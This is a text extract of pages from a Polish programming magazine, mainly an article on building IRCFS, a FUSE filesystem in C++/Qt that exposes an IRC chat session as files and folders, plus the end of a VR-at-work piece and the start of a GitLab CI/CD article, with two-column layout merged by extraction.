Wszystkie przedstawione propozycje mają na celu ostatecznie
wpłynąć na poprawę jakości pracy, a tym samym na jej efektywność.
W wyniku przeprowadzonej w firmie ankiety 93% badanych, ko-
rzystających z technologii VR, uważa, że jej zastosowanie daje moż-
liwość odstresowania się po pracy, a 62% jest przekonana, że nowa
technologia może zwiększyć ich efektywność. Taki sam odsetek pra-
cowników podkreśla, że sprawdza się ona również podczas integracji
z innymi współpracownikami.
Zdajemy sobie sprawę, że wirtualna rzeczywistość nie zastąpi
w pełni kontaktu twarzą w twarz, codziennych rozmów przy kawie,
imprez świątecznych czy spotkań biznesowych. Jednak z pełną świa-
domością należy podkreślić, że dziś jesteśmy świadkami zmiany.
Świat z pewnością nie będzie już taki sam, jak przed czasami pande-
mii. Technologia szczęśliwie rozwija się, jak nigdy wcześniej, czego
również i my w Nokii doświadczamy w naszej codziennej pracy. Waż-
ne więc, aby nie tylko przystosowywać się do zmiany, ale również po-
dążać za trendami i je kreować. Kto, jak nie firmy działające w branży
nowych technologii oraz IT, ma wyznaczać ścieżkę rozwoju?

DANIEL RODZEŃ
Absolwent wydziału Automatyki, Elektroniki i Informatyki na Politechnice Śląskiej oraz Gdańskiej Fundacji Kształcenia Mana-
gerów, gdzie uzyskał tytuł MBA (z ang. Master of Business Administration). Pracował z nowymi technologiami zarówno w kraju,
jak i zagranicą. Obecnie jest Kierownikiem ds. Rozwojowo-Badawczych w krakowskim oddziale firmy Nokia.

{ MATERIAŁ INFORMACYJNY } <19>

BIBLIOTEKI I NARZĘDZIA

FUSE – IRCFS
Publikacja ta stanowi swoistą kontynuację artykułu „Własny system plików z FUSE” [0] z po-
przedniego, jubileuszowego wydania Programisty. Przed przystąpieniem do lektury autor szcze-
rze zachęca do zapoznania się z ww. materiałem, choć nie jest to niezbędny wymóg.

D ziś zajmiemy się utworzeniem prostego systemu plików repre-

zentującego aktywną sesję czatu IRC (ang. Internet Relay Chat)
w taki sposób, aby można było z niego korzystać wyłącznie przy po-
Na potrzeby IRCFS zostanie zaadaptowana implementacja tego
protokołu napisana do artykułu „Nie tylko GUI – Qt na przykładzie
bota IRC” (Programista 8/2019 (87) [1]), która znajduje się w serwi-
mocy klasycznych narzędzi takich jak cat, tail lub dd. Przykład ocze- sie GitHub [2].
kiwanego rezultatu znajduje się w Listingu 0. Z wyżej wymienionego kodu zostanie wyodrębniona klasa klien-
ta IRC przemianowana na kq::irc::base_client:
Listing 0. Orientacyjny cel
Listing 2. Klasa kq::irc::base_client
> ls
KrzaQ
> echo "cześć" > KrzaQ class base_client : public QObject
> sleep 5 {
> cat KrzaQ Q_OBJECT
<ja> cześć public:
<KrzaQ> no cześć, jak leci? explicit base_client(
settings const&,
Oczywiście konieczna jest również obsługa kanałów, w końcu IRC QObject *parent = nullptr
);
to nie tylko rozmowy dwuosobowe. W opinii autora kanały powinny
być reprezentowane przez foldery, ponieważ mają one więcej własno- settings const& config() const { return cfg; }

ści, które należy reprezentować. Przykład w Listingu 1. public slots:

void say(QByteArray const&, QByteArray const&);
Listing 1. Orientacyjny cel – kanał void join(QByteArray const&);
void part(QByteArray const&);
> mkdir \#progmag
> ls void write_line(QByteArray const&);
#progmag
signals:
> ls \#progmag
void message(message_data const&);
topic
users private:
messages void connect_to_irc();
> cat \#progmag/users
void on_read(QByteArray const&);
@KrzaQ
void parse_lines();
ja
Hyzio void identify();
Dyzio void handle_ping(message_data const&);
Zyzio
> echo "Dzień dobry!" > \#progmag/messages settings cfg;
> sleep 30 QTcpSocket* connection;
> cat \#progmag/messages QByteArray input_buffer;
<ja> Dzień dobry! };
<Hyzio> \o
<Dyzio> o/

Wbrew pozorom nie jest to odległy cel. Do jego implementacji będą
wykorzystane następujące składniki:
» biblioteka umożliwiająca tworzenie własnych wirtualnych syste-
mów plików – FUSE,
» biblioteka komunikacyjna z siecią IRC.
Następnie wystarczy je połączyć za pomocą warstwy pośredniczącej
(tzw. glue code), aby uzyskać oczekiwany efekt.
Klasa ta odpowiada za niskopoziomową komunikację z serwerem
sieci IRC. Nie została ona prawie w ogóle zmodyfikowana względem
kodu z [2], więc jej implementacja zostanie pominięta.
W oparciu o kq::irc::base_client utworzona zostanie klasa
kq::irc::client, która będzie bezpośrednim interfejsem dla FUSE.
Musi ona pamiętać stany takie jak:
» otwarte rozmowy z wiadomościami,
» kanały, a w nich:
ǿ użytkownicy na nich,

KOMUNIKACJA Z IRC ǿ temat,

ǿ wiadomości,
IRC jest bardzo prostym protokołem czysto tekstowym. Do nieszy- a także umożliwiać wykonywanie działań:
frowanej sieci można się podłączyć nawet za pomocą narzędzi takich » wysyłanie wiadomości,
jak netcat lub telnet i, zakładając pewną zwinność palców przy od- » dołączanie do kanału,
powiadaniu na komunikaty PING, można takie połączenie utrzymać. » opuszczanie kanału.

<20> { 2 / 2022 < 101 > }

 / FUSE – IRCFS /

Listing 3. Definicja klasy kq::irc::client Listing 6. Funkcja on_message()

class client : public QObject void client::on_message(message_data const& msg)

{ {
Q_OBJECT std::scoped_lock lock{sync};
public: if (msg.type == "PRIVMSG") {
explicit client( if (msg.where.size() && msg.where[0] == '#') {
settings const&, channel& ch = channels[msg.where.toUtf8()];
QObject *parent = nullptr ch.messages.push_back(msg);
); ch.raw_messages.append(format_message(msg));
} else {
void join_channel(QByteArray const&); auto nickname = msg.who.toUtf8().split('!')
void part_channel(QByteArray const&); .front();
query& q = queries[nickname];
void say(QByteArray const&, QByteArray const&); q.messages.push_back(msg);
q.raw_messages.append(format_message(msg));
auto const& get_channels() const { }
return channels; } else if (msg.type == "332") {
} // channel topic
auto channel = '#' + msg.where.split('#').back()
auto const& get_queries() const { .toUtf8();
return queries; channels[channel].topic = msg.message.toUtf8();
} } else if (msg.type == "353") {
// channel users
std::mutex& get_sync() const { return sync; } auto channel = '#' + msg.where.split('#').back()
.toUtf8();
public slots: for (auto const& u : msg.message.split(' ')) {
void on_message(message_data const&); if (!u.size())
continue;
private: channels[channel].users.insert(u.toUtf8());
static QByteArray format_message(message_data const&); }
} else if (msg.type == "JOIN") {
std::map<QByteArray, channel> channels; auto nick = msg.who.split('!').front().toUtf8();
std::map<QByteArray, query> queries; channels[msg.message.toUtf8()].users.insert(nick);
base_client* conn; } else if (msg.type == "PART") {
auto nick = msg.who.split('!').front().toUtf8();
std::mutex mutable sync;
channels[msg.where.toUtf8()].users.erase(nick);
}; } else if (msg.type == "QUIT") {
auto nick = msg.who.split('!').front().toUtf8();
for (auto& [channel, data] : channels) {
Mutex jest obecny, ponieważ komunikacja z FUSE będzie się później data.users.erase(nick);
}
odbywać z różnych wątków. Klasy channel i query przedstawiono }
w Listingach 4 i 5. }

Listing 4. Klasa kq::irc::channel Listing 7. Funkcja say()

struct channel void client::say(QByteArray const& recipient,

{ QByteArray const& message)
std::set<QByteArray> users; {
QByteArray topic; for(auto const& line : message.split('\n')) {
std::vector<message_data> messages; if (!line.size())
QByteArray raw_messages; continue;
}; QMetaObject::invokeMethod(conn, [=]{
conn->say(recipient, line);
}, Qt::QueuedConnection);
Listing 5. Klasa kq::irc::query message_data msg;
msg.message = line;
msg.type = "PRIVMSG";
struct query
msg.when = QDateTime::currentDateTime();
{ msg.who = conn->config().nick;
std::vector<message_data> messages; if (recipient[0] == '#') {
QByteArray raw_messages; channel& ch = channels[recipient];
}; ch.messages.push_back(msg);
ch.raw_messages.append(format_message(msg));
} else {
query& q = queries[recipient];
Obie powyższe klasy zawierają zmienną raw_messages. Będzie się q.messages.push_back(msg);
q.raw_messages.append(format_message(msg));
w niej znajdować całkowita zawartość komunikacji w formie czysto }
tekstowej, aby uniknąć wielokrotnego regenerowania tej samej za- }
}
wartości przy odczytach.
W obu przypadkach – zarówno messages, jak i raw_messages – Wywołanie conn->say(recipient, line) znajduje się wewnątrz
obiekty te są modyfikowane w dwóch przypadkach: lambdy przekazanej do QMetaObject::invokeMethod z parametrem
» gdy serwer wyśle informacje o nowej wiadomości, Qt::QueuedConnection. Jest tak, ponieważ wiele klas Qt ma „aler-
» gdy klient wyśle w danym kierunku wiadomość. gię” na bezpośrednie wywoływanie ich metod z innych wątków, na-
wet jeśli są synchronizowane np. muteksem. Jedną z takich klas jest
Konkretniej rzecz biorąc, dzieje się to w funkcjach on_message() i QTcpClient. Dlatego też wywołanie zostaje zakolejkowane do odpo-
say(). Funkcja on_message() obsługuje nowo przychodzące wiado- wiedniego wątku wykonania.
mości od serwera i, w razie potrzeby, przydziela je do odpowiednich Warto jeszcze wspomnieć o utworzeniu pliku projektowego CMake
kanałów, rozmów prywatnych lub metadanych. dla kodu używającego Qt:

{ WWW.PROGRAMISTAMAG.PL } <21>
BIBLIOTEKI I NARZĘDZIA

Listing 8. Plik CMakeLists.txt damy, że jest to katalog reprezentujący kanał. Jeśli w ścieżce znajduje
list(APPEND IRC_SOURCES się jeszcze jeden znak /, uznajemy, że zapytanie odnosi się do jedne-
irc.cpp go z plików messages/users/topic.
)

qt5_wrap_cpp(IRC_SOURCES Listing 9. Funkcja getattr

irc.hpp
) int getattr(char const* path, struct stat* st)
{
set(CMAKE_AUTOMOC ON) // ...
set(CMAKE_AUTORCC ON)
set(CMAKE_AUTOUIC ON) if (path == "/"sv) {
find_package(Qt5 COMPONENTS Core REQUIRED) st->st_mode = S_IFDIR | 0400;
find_package(Qt5 COMPONENTS Network REQUIRED) st->st_nlink = 2;
} else if (path[1] == '#') {
add_library(irc STATIC) auto p = QByteArray(path + 1).split('/');
target_compile_features(irc PUBLIC cxx_std_17) std::scoped_lock lock{irc_client->get_sync()};
set_target_properties(irc PROPERTIES CXX_EXTENSIONS 0)
target_sources(irc PRIVATE ${IRC_SOURCES}) auto it = irc_client->get_channels().find(p.front());
target_include_directories(irc PUBLIC .) if (it == irc_client->get_channels().cend())
target_link_libraries(irc PUBLIC return -ENOENT;
Qt5::Core
if (p.size() == 2) {
Qt5::Network
st->st_mode = S_IFREG | 0400;
fmt::fmt
st->st_nlink = 1;
) if (p.last() == "messages") {
st->st_size = it->second.raw_messages.size();
} else if (p.last() == "topic") {
FUSE st->st_size = it->second.topic.size();
} else if (p.last() == "users") {
st->st_size = 0;
Biblioteka FUSE to tak naprawdę dwie stosunkowo niezależne części: for(auto const& u : it->second.users)
st->st_size += u.size();
» kod w jądrze systemu, wystawiający generyczny interfejs do pod- st->st_size += it->second.users.size();
} else {
łączenia systemu plików, return -ENOENT;
» biblioteka libfuse odpowiedzialna za translację wywołań do kodu }
} else {
użytkownika. st->st_mode = S_IFDIR | 0400;
st->st_nlink = 2;
if (it->second.messages.size()) {
Aby umożliwić działanie wirtualnego systemu plików, FUSE przeka- auto time = it->second.messages.back().when
.toMSecsSinceEpoch() / 1000;
zuje wywołania syscalli do analogicznych callbacków przekazanych st->st_mtime = time;
st->st_atime = time;
przez programistę. Jest ich ponad 30, ale wszystkie są opcjonalne. Je- st->st_ctime = time;
śli jakiegoś brakuje, to albo używane są inne dostępne, albo zwracany }
}
jest komunikat błędu, że funkcjonalność nie jest dostępna. } else {
std::scoped_lock lock{irc_client->get_sync()};
Na potrzeby IRCFS zaimplementowane zostaną następujące funkcje: auto it = irc_client->get_queries().find(path+1);
» getattr() – do przekazywania informacji o atrybutach elemen- if (it == irc_client->get_queries().cend())
return -ENOENT;
tów systemu plików, auto time = it->second.messages.back().when
.toMSecsSinceEpoch() / 1000;
» mkdir() – do tworzenia folderów, czyli dołączania do kanałów, st->st_mtime = time;
» rmdir() – do usuwania folderów, czyli do opuszczania kanałów, st->st_atime = time;
st->st_ctime = time;
» read() – do odczytywania plików, czyli głównie komunikatów,
» write() – do zapisu do plików, czyli do wysyłania komunikatów, st->st_mode = S_IFREG | 0400;
st->st_nlink = 1;
» readdir() – do wyświetlenia zawartości folderu. st->st_size = it->second.raw_messages.size();
}

Dla uproszczenia implementacji oraz ustrukturyzowania interfejsu return 0;

}
nasz system plików:
» nie będzie zawierał zagnieżdżonych katalogów, Funkcja mkdir() powoduje dołączenie do kanału. Jeśli próbujemy
» wszystkie pliki w głównym katalogu będą odpowiadały rozmo- utworzyć katalog poza głównym katalogiem systemu plików, zwracany
wom bezpośrednim, jest błąd.
» wszystkie katalogi w głównym katalogu będą odpowiadały ka-
Listing A. Funkcja mkdir
nałom, do których wszedł klient IRC, a ich nazwy będą zaczy-
nały się od znaku #, int mkdir(char const* path, mode_t)
{
» wszystkie katalogi będą zawierały wyłącznie następujące trzy pliki: if (path[1] != '#')
return -EINVAL;
ǿ messages – zawierający dane wiadomości na danym kanale,
QByteArray p(path+1);
ǿ users – zawierający listę użytkowników danego kanału, if (p.count('/'))
ǿ topic – zawierający obecny temat. return -EINVAL;

std::scoped_lock lock{irc_client->get_sync()};
irc_client->join_channel(p);
W Listingu 9 przedstawiono implementację funkcji getattr(). War-
return 0;
to zauważyć, że wszystkie ścieżki zaczynają się od znaku / i są rela- }
tywne do katalogu montowania. Jeśli nazwa zaczyna się od #, zakła-

<22> { 2 / 2022 < 101 > }

 / FUSE – IRCFS /

Funkcja rmdir() jest odwotnością mkdir(). Jej implementacja Listing D. Funkcja write
jest prawie identyczna. int write(char const* path, char const* buffer, size_t size,
off_t offset, fuse_file_info *fi)
Listing B. Funkcja rmdir {
if (path[1] == '#') {
int rmdir(char const* path) auto p = QByteArray(path + 1).split('/');
{ if (p.size() != 2)
if (path[1] != '#') return -EINVAL;
return -EINVAL;
std::scoped_lock lock{irc_client->get_sync()};
QByteArray p(path+1); auto const channels = irc_client->get_channels();
if (p.count('/')) auto it = channels.find(p.front());
return -EINVAL;
if (it == channels.cend())
std::scoped_lock lock{irc_client->get_sync()}; return -ENOENT;
irc_client->part_channel(p); if (p.back() != "messages")
return -EINVAL;
return 0;
} auto data = QByteArray(buffer, size);
irc_client->say(p.front(), data);
Funkcja read() odpowiada za odczyt danych z plików. Jeśli odczyt } else {
std::scoped_lock lock{irc_client->get_sync()};
dotyczy pliku rozmowy bezpośredniej lub wiadomości na kanale, auto const& queries = irc_client->get_queries();
dane są wczytywane z odpowiedniego obiektu raw_messages. Temat auto it = queries.find(path + 1);
if (it == queries.cend())
oraz użytkownicy na kanale generowane są dynamicznie. return -ENOENT;
auto data = QByteArray(buffer, size);
Listing C. Funkcja read DEBUG("data({}): {}", data.size(),
data.toStdString());
int read(char const* path, char* buffer, size_t size, irc_client->say(path + 1, data);
off_t offset, fuse_file_info *fi) }
{
std::string msg; return size;
}
if (path[1] == '#') {
auto split = QByteArray(path+1).split('/');
Funkcja readdir() zwraca pliki lub katalogi znajdujące się w danej
std::scoped_lock lock{irc_client->get_sync()}; ścieżce. Każdy element jest przekazywany poprzez wywołanie funkcji
auto it = irc_client->get_channels().find(split[0]);
if (it == irc_client->get_channels().cend()) filler(), otrzymanej od FUSE jako callback. W głównym katalogu
return -ENOENT; zwracane są kanały oraz rozmowy bezpośrednie, a w katalogach ka-
if (split[1] == "messages") {
msg = it->second.raw_messages.toStdString(); nałów tylko odpowiednie pliki messages, title oraz users.
} else if (split[1] == "topic") {
msg = it->second.topic.toStdString(); Listing E. Funkcja readdir
msg += '\n';
} else if (split[1] == "users") { int readdir(char const* path, void* buffer,
msg.reserve(it->second.users.size() * 8); fuse_fill_dir_t filler, off_t offset, fuse_file_info* fi)
for (auto const& u : it->second.users) { {
msg += u.toStdString(); filler(buffer, ".", nullptr, 0);
msg += '\n'; filler(buffer, "..", nullptr, 0);
}
} else { if (path == "/"sv) {
return -ENOENT; std::set<std::string> channels;
} std::set<std::string> queries;
} else { {
std::scoped_lock lock{irc_client->get_sync()}; std::scoped_lock lock{irc_client->get_sync()};
auto const& queries = irc_client->get_queries(); for (auto const& [channel, messages] :
auto it = queries.find(path + 1); irc_client->get_channels()) {

if (it == queries.cend()) queries.insert(channel.toStdString());

return -ENOENT; }
msg = it->second.raw_messages.toStdString(); for (auto const& [who, messages] :
} irc_client->get_queries()) {

if (offset >= msg.size()) queries.insert(who.toStdString());

return 0; }
}
auto bytes_to_copy = std::min(size, for (auto const& q : queries) {
msg.size() - offset); filler(buffer, q.c_str(), nullptr, 0);
auto begin = msg.cbegin() + offset; }
std::copy(begin, begin + bytes_to_copy, buffer); } else if (path[1] == '#') {
return bytes_to_copy; std::scoped_lock lock{irc_client->get_sync()};
} auto it = irc_client->get_channels().find(path+1);
if (it == irc_client->get_channels().cend())
return -ENOENT;
Funkcja write() pozwala wyłącznie na dopisywanie do końca pli- filler(buffer, "users", nullptr, 0);
ku – nie da się modyfikować historii. Można jej używać wyłącznie filler(buffer, "topic", nullptr, 0);
filler(buffer, "messages", nullptr, 0);
do plików odpowiedzialnych za wiadomości. W tej wersji nie przewi- } else {
dziano np. możliwości zmiany tematu na kanale. return -EINVAL;
}
return 0;
}

{ WWW.PROGRAMISTAMAG.PL } <23>
BIBLIOTEKI I NARZĘDZIA

Listing 12. Użycie IRCFS

IRCFS
> ./src/ircfs ircfs irc.ircnet.com IRC
Mając gotowe implementacje FUSE oraz biblioteki do IRC, można > ls IRC
> mkdir IRC/\#progmag
przystąpić do ich uruchomienia. Zarówno FUSE, jak i Qt mają wła- > ls -la IRC/\#progmag
sny kod do obsługi pętli zdarzeń (ang. event loop), wzajemnie nie- total 0
dr-------- 2 krzaq krzaq 0 Jan 1 1970 .
kompatybilny. Dla zachowania prostoty implementacji autor zdecy- dr-------- 2 krzaq krzaq 0 Jan 1 1970 ..
dował się wywołać pętlę zdarzeń Qt w osobnym wątku. -r-------- 1 krzaq krzaq 0 Jan 1 1970 messages
-r-------- 1 krzaq krzaq 23 Jan 1 1970 topic
-r-------- 1 krzaq krzaq 13 Jan 1 1970 users
Listing F. funkcja main() > cat IRC/\#progmag/users
@KrzaQ
int main(int argc, char** argv) ircfs
{ > cat IRC/\#progmag/topic
fuse_operations ops = { test #progmag bez Hyzia
.getattr = &kq::getattr, > echo "hello\!" >> IRC/\#progmag/messages
.mkdir = &kq::mkdir, > cat IRC/\#progmag/messages
.rmdir = &kq::rmdir, [13:31:22] <ircfs>: hello!
.read = &kq::read, > cat IRC/\#progmag/messages
.write = &kq::write, [13:31:22] <ircfs>: hello!
.readdir = &kq::readdir, [13:31:30] <KrzaQ>: \o
}; # prywatna wiadomość
> ls IRC
if (argc < 4)
KrzaQ ‚#progmag'
return EXIT_FAILURE;
> cat IRC/KrzaQ
std::thread client{ [nick = argv[1], host = argv[2]]{ [13:32:50] <KrzaQ>: test prywatnej wiadomosci
kq::client_main(nick, host); > echo "dziala" >> IRC/KrzaQ
} }; > cat IRC/KrzaQ
[13:32:50] <KrzaQ>: test prywatnej wiadomosci
argv[2] = argv[0]; [13:33:20] <ircfs>: dziala
return fuse_main(argc - 2, argv + 2, &ops, nullptr); > mkdir IRC/\#progmag_2
QCoreApplication::quit(); > cat IRC/\#progmag_2/users
client.join(); @Hyzio
} KrzaQ
ircfs
> cat IRC/\#progmag_2/topic
temat #progmag 2
Klasa QCoreApplication zawsze wymaga przekazania choć jednej > echo "hi" >> IRC/\#progmag_2/messages
wartości argv, choć w opinii autora jest to zbędne. > cat IRC/\#progmag_2/messages
[13:35:36] <ircfs>: hi
[13:35:41] <Hyzio>: \o
Listing 10. Funkcja kq::client_main()

void kq::client_main(std::string_view nick,

std::string_view server, int port)
{
int fake_argc = 1;
char fake_argv_val[2] = { "." }; Rysunek 0. Listing 12 z perspektywy użytkownika Hyzio
char* fake_argv[2] = { fake_argv_val, nullptr };
QCoreApplication app(fake_argc, fake_argv);

qRegisterMetaType<kq::irc::message_data>("message_data");

kq::irc::settings settings = {
PODSUMOWANIE
QString::fromStdString(std::string{server}),
static_cast<quint16>(port), W opinii autora implementacja IRCFS jako proof of concept udała się.
QString::fromStdString(std::string{nick}) Niewątpliwie praktyczność implementacji protokołu IRC jako syste-
};
irc_client = new kq::irc::client(settings, &app); mu plików może wydać się dyskusyjna, ale sam projekt porusza cie-
app.exec(); kawy problem edukacyjny oraz przedstawia rozwiązania, które mogą
} być zaimplementowane w innych projektach.
Listing 11. Kompilacja
Kody źródłowe znajdują się standardowo w serwisie GitHub [3].

> cmake \
-DCMAKE_EXPORT_COMPILE_COMMANDS=TRUE \
-DCMAKE_MODULE_PATH=$(pwd)/../cmake \
Bibliografia
-DCMAKE_BUILD_TYPE=Debug \
[0] https://programistamag.pl/programista-1-2022-100/
..
[1] https://programistamag.pl/nie-tylko-gui-qt-na-przykladzie-bota-do-sieci-irc/
[...]
[2] https://github.com/KrzaQ/qt-irc-client
> cmake --build .
[3] https://github.com/KrzaQ/programista-ircfs
[ 8%] Automatic MOC and UIC for target irc
[ 8%] Built target irc_autogen
[ 16%] Generating moc_irc.cpp
[...] PAWEŁ "KRZAQ" ZAKRZEWSKI
[100%] Linking CXX executable ircfs
[100%] Built target ircfs https://dev.krzaq.cc
Absolwent Automatyki i Robotyki oraz Informatyki na Zachodniopomor-
Po kompilacji można ostatecznie skorzystać z owocu naszej pracy.
skim Uniwersytecie Technologicznym. Pracuje jako Software Engineer
Kolejność argumentów jest następująca: nazwa_programu nick ser- w Sauce Labs. Programowaniem interesuje się od dzieciństwa, jego ostat-
wer_irc katalog. nie zainteresowania to C++ i metaprogramowanie.

<24> { 2 / 2022 < 101 > }

BIBLIOTEKI I NARZĘDZIA

CI/CD jako nowoczesny workflow

Dziś nawet przy najmniejszym projekcie pracuje zespół ludzi. Jest to całkowicie pożądany
scenariusz. Fakt ten wynika oczywiście z tego, że świat IT opanował każdą dziedzinę życia,
a nawet najprostsza aplikacja, strona internetowa itd. powinna działać wedle założeń już nie
tylko na jednym urządzeniu, a na każdym komputerze, laptopie, smartfonie, a nawet telewizorze,
szczoteczce czy lodówce. Ponadto należy pamiętać, że wspomniane smartfony mogą działać
w oparciu o różne systemy operacyjne czy posiadać dowolną przeglądarkę internetową. Prawdą
jest, że jeszcze pięć lat temu stworzenie prostej strony internetowej czy aplikacji nie wymagało
takiego nakładu sił i środków, jak obecnie, ale czy aplikacje te były semantyczne i bezpieczne?
Jak tworzyć projekty w oparciu o CI/CD i jak taki pipeline powinien wyglądać?

IT, CZYLI LECIMY KU GWIAZDOM
Świat IT nieznający żadnych granic i podziałów mknie przed siebie
szybciej i dalej niż wysłany przez Elona Muska model Roadster Tesli
w kosmos. Obecnie gdy piszę ten artykuł, pojazd ów oddalony jest od
planety Ziemia o 375 195 525 km. A to wszystko głównie dzięki nam,
ludziom z branży IT, i jak to klasyk mówi możemy się rozejść?
Być może ktoś powie, że przecież już w 1969 r. człowiek wylądował
na Księżycu, a główny komputer na pokładzie miał mniejszą moc ob-
liczeniową niż dzisiejsze kalkulatory. Oczywiście jest to prawda, a jako
ciekawostkę mogę dodać, że szacunkowo kalkulator TI-73 z roku 1998
był już 140 razy szybszy od wspomnianego pokładowego komputera
Apollo Guidance Computer, ale świat IT się przecież nie zatrzymuje.
Skupmy się więc na tym, jak do tego doszło, że Elon Musk w ra-
mach pomocy Ukrainie jest w stanie z godziny na godzinę za pomocą
swoich zespołów projektowo-programistycznych przeprogramować
będące na niskiej okołoziemskiej orbicie satelity programu Starlink
i zmienić napięcie potrzebne do zasilania naziemnych modemów tak,
by można było je uruchomić z samochodowej zapalniczki?
Świat IT obecnie radzi sobie z tymi wyzwaniami na różne sposoby.
Wymieniając kilka przykładów, możemy wspomnieć o frameworkach
wspomagających programistów czy portalach typu GitHub, dzięki
którym nad jednym projektem może pracować bardzo duża liczba
specjalistów. Na przełomie ostatnich kilku lat informatyka zagości-
ła dosłownie wszędzie, w wyniku czego takie projekty, jakie realizu-
je np. SpaceX, są rozwijane, programowane, testowane, audytowane
i stale aktualizowane przez ogromną rzeszę ludzi.
Czas pokazał, że DevOps się przyjął, a największe serwisy wspoma-
gające zespoły programistyczne nie oferują już tylko systemu kontroli
wersji, ale ewoluowały w platformy DevOps. Doskonałym przykładem
jest tutaj GitLab, który ze swoim wachlarzem narzędzi sprawdza się nie
tylko przy samym programowaniu, ale także przy planowaniu, wdraża-
niu, deploymencie, testowaniu, audytowaniu itd. Przyjrzyjmy się więc
bliżej i przeanalizujmy na przykładzie, jak taki nowoczesny projekt
w oparciu o narzędzia dostępne na GitLab powinien wyglądać.
CI/CD
CI/CD – pod tym skrótem kryje się ciągła integracja (ang. continuous
integration) i ciągłe dostarczanie (ang. continuous delivery). Warto tu-
taj dodać, że CD często niesie ze sobą dwa znaczenia, wspomnianego
już ciągłego dostarczania, a także ciągłego wdrażania (ang. continu-
ous deployment). Razem pod postacią CI/CD tworzy to spójny zbiór
dobrych praktyk, zasad i wytycznych nowoczesnego przepływu pracy
(ang. workflow). Taki właśnie zestaw trzech filozofii reprezentują na-
rzędzia CI/CD dostępne w GitLab. Przyjrzyjmy się bliżej, co się za
nimi tak naprawdę kryje.
Continuous integration to podejście mające na celu zrozumie-
nie i pogodzenie się z faktem, że obecnie duża ilość osób pracują-
cych nad danym projektem może dokonywać wielu drobnych zmian,
często w bardzo krótkim czasie. W przypadku CI/CD mowa jest
o zbiorze narzędzi i automatyzacji na naszym pipeline pozwalających
po każdej, nawet najmniejszej zmianie przeprowadzić szereg automa-
tycznych zadań, takich jak na przykład testy całego projektu itp.
Continuous delivery z kolei tak naprawdę zaczyna się tam, gdzie

DEVOPS, CZYLI ZMIEŃMY SIĘ
DevOps to nic innego jak połączenie świata programistów ze świa-
tem administratorów infrastruktury. Kluczem tutaj niewątpliwie jest
to, co tak naprawde mamy rozumieć przez słowo „połączenie”. Ważne
jest bowiem, by zrozumieć, że nie jest to przysłowiowy informatyk
złota rączka, który wczoraj był programistą lub administratorem,
a od dziś robi i jedno, i drugie, bo „przecież DevOps”. Zbiór dobrych
praktyk, metod i narzędzi stojący za słowem DevOps ma na celu za-
cieśnić i usprawnić pracę oraz komunikację między tymi dwoma do
tej pory dość hermetycznymi środowiskami.
kończy się CI i jest dalszą częścią całości CI/CD. Odpowiada za przy-
gotowanie do deploymentu całego projektu, a to oznacza, że koncen-
truje się na przygotowaniu gotowej i działającej aplikacji.
Warto tutaj zaznaczyć, że tak przygotowana aplikacja co prawda
jest już często po pierwszych automatycznych testach, ale jest to nadal
bardziej testowa wersja. Na jej podstawie zespoły są w stanie spraw-
dzić, jak i czy wszystkie funkcje działają prawidłowo.
Continuous deployment natomiast to nic innego jak automa-
tyczne zbudowanie i przygotowanie tak zwanej finalnej aplikacji pro-
dukcyjnej. Ten punkt najczęściej jest ostatnim na pipeline, choć nie
zawsze tak musi być. W niektórych przypadkach testy danych zmian

<26> { 2 / 2022 < 101 > }


są przeprowadzane zarówno przed deploymentem, jak i po nim. Nie
zawsze jest on automatyczny, może być ustawiony jako manualny,
czyli wymagający ingerencji użytkownika. Takie podejście stosuje
się w projektach, w których przed finalnym wydaniem nowej wersji
mamy do czynienia z recenzją lub audytem.
NO TO DO RZECZY
CI/CD jest elastyczny i w pełni konfigurowalny, co oznacza, że to od
nas zależy, jakie punkty i w jakiej kolejności pojawią się na pipeline.
Dodatkowo możemy zdefiniować, czy dany etap będzie wyzwala-
ny okresowo, czy też automatycznie po każdej zmianie lub tylko po
wyzwoleniu danego tagu. To od naszej konfiguracji zależy także, czy
dany punkt będzie wykonywany automatycznie, czy też manualnie.
Możemy także skonfigurować workflow oparty na pipeline, gdzie wy-
konanie danego punktu będzie zależne od poprzedzającego go itd.
Na Rysunku 1 zaprezentowany został przykładowy projekt o na-
zwie „Programista”. W tym artykule nie będziemy się skupiać na sa-
mym projekcie ani na tym, w czym i w jaki sposób został napisany.
Nas będzie głównie interesowała widoczna w menu głównym za-
kładka „CI/CD” i wszystko to, co wiąże się z ciągłym wytwarzaniem
Rysunek 1. Główny dashboard projektu w GitLab
Rysunek 2. Narzędzie do walidowania konfiguracji pipeline
{ WWW.PROGRAMISTAMAG.PL }
/ CI/CD jako nowoczesny workflow /
i deploymentem. To, że GitLab pozwala nam korzystać z CI/CD, nie
jest jednoznaczne z tym, że automatycznie zestaw tych narzędzi jest
włączony. W przypadku pracy z workflow GitLaba, aby włączyć i za-
rządzać narzędziami CI/CD, powinniśmy stworzyć i skonfigurować
plik .gitlab-ci.yml. Dzięki niemu będziemy w stanie konfigurować pi-
peline projektu.
YAML to często wykorzystywany do wszelkiej maści plików
konfiguracyjnych język, ponieważ za jego pomocą opisujemy dane
w ustrukturalizowany sposób. To niewątpliwie sprawia, że jest tak
szeroko stosowany i lubiany, jednak podczas pisania skryptów YAML
trzeba pamiętać, że jest on bardzo wrażliwy na wszelkie białe znaki.
Na szczęście GitLab też o tym wie i przygotował opcję sprawdzania
poprawności nie tylko struktury, ale także zmiennych itd. Aby otwo-
rzyć przeznaczony do tego walidator, zaprezentowany na Rysunku 2,
wybieramy CI/CD -> Pipelines i klikamy w górnym prawym rogu
przycisk CI lint.
CI lint nie jest oczywiście jedynym sposobem, ponieważ narzę-
dzie znane pod nazwą Pipeline Editor nie tylko pozwoli nam do-
wiedzieć się, czy nasza konfiguracja jest zgodna ze standardem, ale
także przedstawi wizualizacje punktów i ich połączeń na pipeline
(Rysunek 3). To nie wszystko, ponieważ narzędzie to zostało wypo-
sażone w podpowiedzi podczas pisania,
a w zakładce Lint znajdziemy wszystkie
zadeklarowane parametry z wartościami
i ich właściwościami. Dodatkowo może-
my także zobaczyć cały plik YAML, któ-
ry zostanie finalnie użyty.
Nie będziemy na łamach tego artykułu
przedstawiać możliwości i funkcji wszyst-
kich narzędzi wchodzących w skład Git­
Lab CI/CD. Nie trzeba chyba dodawać,
że zabawa z nimi i odkrywanie, co potra-
fią, będzie niesamowitą frajdą, do której
gorąco zachęcam.
W tym miejscu warto wspomnieć, że
GitLab przy tworzeniu nowego projektu
daje także możliwość korzystania z na-
rzędzi CI/CD dla zewnętrznych repozy-
toriów – Rysunek 4.
CI/CD dla zewnętrznego projektu to
nie jest tylko „dodatek” i tak naprawdę ma
bardzo szerokie zastosowanie. Na przykład,
